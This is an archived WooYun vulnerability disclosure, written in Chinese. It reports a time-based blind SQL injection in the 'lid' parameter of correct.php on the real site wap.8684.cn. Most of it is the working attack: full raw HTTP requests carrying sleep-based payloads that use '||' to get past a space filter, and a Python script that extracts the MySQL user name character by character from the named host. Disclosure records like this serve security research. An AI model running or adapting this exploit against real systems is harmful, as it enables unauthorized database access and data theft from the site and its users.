乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-23: 细节已通知厂商并且等待厂商处理中 2015-10-28: 厂商已经主动忽略漏洞,细节向公众公开
POST /correct.php?cityid=208 HTTP/1.1Content-Length: 178Content-Type: application/x-www-form-urlencodedReferer: http://wap.8684.cnCookie: city_id=208; city_name=%E6%9C%94%E5%B7%9E; ecity=shuozhou; last_bus_from=1; last_bus_to=1; last_train_from=1; last_train_to=1; Hm_lvt_39435912262668f2c8c261584f242c8e=1445531533,1445531533,1445531533; Hm_lpvt_39435912262668f2c8c261584f242c8e=1445531533Host: wap.8684.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*mod=%e6%8f%90%e4%ba%a4&ck=1&comp=Acunetix&desdw=1&desup=1&htime=1&hx=0&kind=1&ldw=1&lid=%bf'%bf%22+||1=if(length(user())=21,sleep(5),1)#&lname=frojhrkd&lup=1&price=1&qtime=1&yy=1
注入点:lid#本来是一个款字节报错注入,但是分析了一下不可以利用,因为他会连续执行2条SQL语句。所以构造了一个延迟注入。空格被过滤了,使用||,然后就不需要空格了。为真时,存在延迟,user长度为21:
为假时,不存在延迟:
#user的第一位为F(ascii:70):
POST /correct.php?cityid=208 HTTP/1.1Content-Length: 186Content-Type: application/x-www-form-urlencodedReferer: http://wap.8684.cnCookie: city_id=208; city_name=%E6%9C%94%E5%B7%9E; ecity=shuozhou; last_bus_from=1; last_bus_to=1; last_train_from=1; last_train_to=1; Hm_lvt_39435912262668f2c8c261584f242c8e=1445531533,1445531533,1445531533; Hm_lpvt_39435912262668f2c8c261584f242c8e=1445531533Host: wap.8684.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*mod=%e6%8f%90%e4%ba%a4&ck=1&comp=Acunetix&desdw=1&desup=1&htime=1&hx=0&kind=1&ldw=1&lid=%bf'%bf%22+||1=if(ascii(MID(user(),1,1))=70,sleep(5),1)#&lname=frojhrkd&lup=1&price=1&qtime=1&yy=1
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'Cookie':'city_id=208; city_name=%E6%9C%94%E5%B7%9E; ecity=shuozhou; last_bus_from=1; last_bus_to=1; last_train_from=1; last_train_to=1; Hm_lvt_39435912262668f2c8c261584f242c8e=1445531533,1445531533,1445531533; Hm_lpvt_39435912262668f2c8c261584f242c8e=1445531533', 'Content-Type':'application/x-www-form-urlencoded'}payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())user = ''for i in range(1, 22): for payload in payloads: s = "%%bf%%27%%bf%%22+||1=if(ascii(mid(user(),%s,1))=%s,sleep(5),1)#" % (i, ord(payload)) s = "mod=%e6%8f%90%e4%ba%a4&ck=1&comp=Acunetix&desdw=1&desup=1&htime=1&hx=0&kind=1&ldw=1&lname=frojhrkd&lup=1&price=1&qtime=1&yy=1&lid="+s conn = httplib.HTTPConnection('wap.8684.cn', timeout=100) start_time = time.time() conn.request('POST','/correct.php?cityid=208',s,headers) h=conn.getresponse().read() conn.close() print '.', if time.time() - start_time > 5.0: user += payload print '\n\n[in progress]', user, break print '\n[Done] MySQL user is %s' % user
危害等级:无影响厂商忽略
忽略时间:2015-10-28 15:00
漏洞Rank:4 (WooYun评价)
暂无